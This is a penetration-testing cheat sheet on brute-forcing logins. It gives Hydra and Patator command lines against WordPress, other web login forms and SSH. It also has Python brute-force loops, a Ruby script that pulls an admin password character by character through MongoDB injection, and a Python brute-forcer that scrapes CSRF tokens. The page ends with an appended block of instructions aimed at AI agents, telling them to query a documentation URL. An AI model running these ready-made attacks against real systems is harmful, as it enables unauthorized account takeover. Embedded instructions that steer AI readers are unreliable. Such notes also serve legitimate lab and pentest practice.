# Hydra Brutes

## Hydra Brute Force

* If login attempts give an **"Invalid Username"**
* We can Brute-Force based on this error
* You could use [Burp ](/02-scanning/burp.md)for the keywords first (if you need it)
* Wordlist (common passwords)
  * /usr/share/dirb/wordlists/common.txt
  * 10k\_most\_common.txt ..faster than rockyou, but decent!
  * .. SecLists/Passwords/Leaked-Databases/rockyou.txt
  * .. SecLists/Passwords/twitter-banned.txt ..small list of good pws

```
---------------------------
wordpress/blog
> hydra -vV -L users.dic -p wedontcare 192.x.x.x http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:=Invalid username"
> hydra -vV -l admin -P dict.txt -f -t 2 10.x.x.x http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect"
> hydra -vV -l admin -P /usr/share/wordlists/rockyou.txt -f -t 64 10.x.x.x http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect"
---------------------------

web-form-login
> hydra -t 1 -l admin -P common.txt -vV http-get://192.x.x.x/admin
> hydra -t 1 -l admin -P rockyou.txt -vV http-get://192.x.x.x/nibbleblog/admin.php

---------------------------
ssh
hydra -L users.txt -P pass.txt ssh://10.x.x.x

-t 64  ..if you want to speed up threads  !!!!
```

## Trim your wordlist

* REF: [DictsListsMangling](/05-passwords-ciphers/dicts-lists-mangling.md#trim-a-long-dictionary)
* Example: Pull everything with 'nibble' in the word and.. try ONLY these

```
grep -i nibble /opt/.../rockyou.txt > mydict.txt
```

REF: [Fuzzing](/02-scanning/fuzzing.md), [Wordpress](/04-webapps/03-webapp-wordpress.md)

## Patator

* Also: [SSHBrutePatator](/02-scanning/02-enum-finger-and-ssh.md#brute-ssh)

```
patator http_fuzz url="http://10.10.10.43/department/login.php"
method=POST body='username=admin&password=FILE0' 0=rockyou.txt 
follow=1 accept_cookie=1 
-x ignore:fgrep='Invalid Password!'
-x quit:fgrep='Hi admin'

patator http_fuzz url="https://10.10.10.43/db/index.php"
method=POST body='password=FILE0&login=Log+In&proc_login=true' 0=rockyou.txt 
follow=1 accept_cookie=1 
-x ignore:fgrep='Incorrect password.' 
-x quit:fgrep='test'
```

## **Python Brute Force Starter Script:**

```
sudo apt-get install python
sudo apt-get install python-pip
pip install requests

import requests as rq
req = rq.get("http://xyz.com/login.php?pass=1234")
print(req.text)
```

## Python Brute Loop:

* REF: [PythonBase64Loop](/05-passwords-ciphers/04-cipher-decrypt.md#python-loop-base64)

```
import requests as rq
for i in range(1300,99999):
    req = rq.get("http://xyz.com/login.php?pass="+str(i))
    if "Wrong pass" in req.text:
        print("Attempt #%d" % i)
    else:
        print("\n\nSuccess!\nPassword: %d" % i)
        break
```

## Ruby Brute Loop

* Ruby Script for passwords on [MongoDBInjection](/04-webapps/03-webapp.md#mongodb-injection)
* Test every letter to see if it matches the 'first' letter/set

```
--------------------
Goal:
5b317d17-3ee3-4865-8605-bb579f58c10a

--------------------
Loop every digit:
a
b
c
ca
cb
cc

--------------------
Need 'httparty' module
>> sudu gem install httparty
>> vi expl.rb

--------------------
require 'httparty'
URL="mymongo.com"
def check?(str)
  resp = HTTParty.get("http://#{URL}/?search=admin' %26%26 this.password.match(/^#{str}/)%00")
  return resp.body=~ />admin</
end
#puts check?("5").inspect
#puts check?("a").inspect
CHARSET = ('a'..'z').to_a+('0'..'9').to_a+['-']
password = ""

while true
  CHARSET.each do |c|
	puts "Trying: #{c} for #{password}"
	test = password+c
	if check?("^#{test}.*$")
	  password+=c
	  puts password
	  break
	  end
  end
end

--------------------
Note:
^5       ..starts with 5
>admin<  ..used this b/c success page had this tag with >< marks
"5" and "aaa" as yes/no examples
```

## Brute CSRF Python

* Scrape the page and get the csrf token
* REF: SenseHTB ippsec, [pfsense](/04-webapps/pfsense.md)

```
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import re
re_csrf = 'csrfMagicToken = *(.*?)*'
s = requests.session()
lines = open('passwords.txt')
for password in lines:
    r = s.post('http://127.0.0.1/index.php')
    csrf = re.findall(re_csrf, r.text)[0]
    login = {'__csrf_magic': csrf, 'usernamefld': 'rohit', 'passwordfld': password[:-1], 'login': 'login'}
    r = s.post('http://127.0.0.1/index.php', data=login)
    if 'Dashboard' in r.text:
        print("Valid Login %s:%s" % ("rohit", password[:-1]))
    else:
        print("Failed")
        s.cookies.clear()
#print(r.text)
#print(csrf)

execute:
python3 bf-pf.py
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/05-passwords-ciphers/hydra.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.